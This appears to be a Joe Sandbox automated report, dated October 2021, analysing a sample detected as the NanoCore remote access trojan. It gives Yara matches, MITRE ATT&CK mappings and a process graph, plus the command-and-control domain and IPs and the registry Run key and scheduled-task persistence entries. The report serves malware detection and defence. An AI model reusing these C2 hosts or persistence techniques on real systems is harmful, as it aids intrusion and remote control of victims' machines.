tributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting11DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools1Input Capture21System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API1Scheduled Task/Job1DLL Side-Loading1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder21Process Injection312Scripting11Security Account ManagerSystem Information Discovery35SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsScheduled Task/Job1Logon Script (Mac)Scheduled Task/Job1Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder21Software Packing12LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading12DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 501919 Sample: ameHrrFwNp.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 61 strongodss.ddns.net 2->61 67 Malicious sample detected (through community Yara rule) 2->67 69 Sigma detected: NanoCore 2->69 71 Detected Nanocore Rat 2->71 73 6 other signatures 2->73 10 ameHrrFwNp.exe 39 2->10         started        14 bspmflqee.pif 2 2->14         started        16 bspmflqee.pif 2->16         started        18 7 other processes 2->18 signatures3 process4 file5 57 C:\Users\user\AppData\...\bspmflqee.pif, PE32 10->57 dropped 89 Drops PE files with a suspicious file extension 10->89 20 bspmflqee.pif 2 4 10->20         started        91 Creates autostart registry keys with suspicious values (likely registry only malware) 14->91 93 Creates multiple autostart registry keys 14->93 24 RegSvcs.exe 2 14->24         started        59 C:\Users\user\AppData\Roaming\...\Update.vbs, ASCII 16->59 dropped 26 RegSvcs.exe 16->26         started        28 conhost.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 18->32         started        34 RegSvcs.exe 18->34         started        signatures6 process7 file8 49 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 20->49 dropped 75 Multi AV Scanner detection for dropped file 20->75 77 Writes to foreign memory regions 20->77 79 Allocates memory in foreign processes 20->79 81 Injects a PE file into a foreign processes 20->81 36 RegSvcs.exe 1 11 20->36         started        signatures9 process10 dnsIp11 63 185.19.85.175, 48562, 49802, 49805 DATAWIRE-ASCH Switzerland 36->63 65 strongodss.ddns.net 197.210.54.24, 48562, 49800, 49807 VCG-ASNG Nigeria 36->65 51 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 36->51 dropped 53 C:\Users\user\AppData\Local\...\tmp8F04.tmp, XML 36->53 dropped 55 C:\Program Files (x86)\...\dhcpmon.exe, PE32 36->55 dropped 83 Protects its processes via BreakOnTermination flag 36->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 36->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->87 41 schtasks.exe 1 36->41         started        43 schtasks.exe 1 36->43         started        file12 signatures13 process14 process15 45 conhost.exe 41->45         started        47 conhost.exe 43->47         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif32%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        32.2.RegSvcs.exe.1300000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        5.2.RegSvcs.exe.11a0000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        19.2.RegSvcs.exe.500000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        5.2.RegSvcs.exe.6fb0000.11.unpack100%AviraTR/NanoCore.fadteDownload File
        24.2.RegSvcs.exe.1300000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        strongodss.ddns.net
        		197.210.54.24
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmpfalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.19.85.175
            		unknownSwitzerland
            		48971DATAWIRE-ASCHtrue
            197.210.54.24
            		strongodss.ddns.netNigeria
            		29465VCG-ASNGfalse

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:501919
            Start date:13.10.2021
            Start time:12:14:37
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 14m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:ameHrrFwNp.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:37
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@29/48@5/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 9.8% (good quality ratio 9.3%)
            • Quality average: 76%
            • Quality standard deviation: 27.7%
            HCA Information:
            • Successful, ratio: 52%
            • Number of executed functions: 230
            • Number of non-executed functions: 134
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.54.110.249, 20.199.120.151, 95.100.218.151, 20.82.209.183, 20.199.120.85, 95.100.218.79, 20.199.120.182, 20.50.102.62, 8.247.248.249, 8.247.248.223, 8.247.244.221, 2.20.178.10, 2.20.178.56, 2.20.178.24, 2.20.178.33, 20.82.210.154
            • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/501919/sample/ameHrrFwNp.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            12:16:19AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            12:16:26Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
            12:16:27API Interceptor624x Sleep call for process: RegSvcs.exe modified
            12:16:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Roaming\98025414\Update.vbs
            12:16:30Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
            12:16:35AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            12:16:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            12:16:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Roaming\98025414\Update.vbs
            12:17:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            12:17:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Roaming\98025414\Update.vbs

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
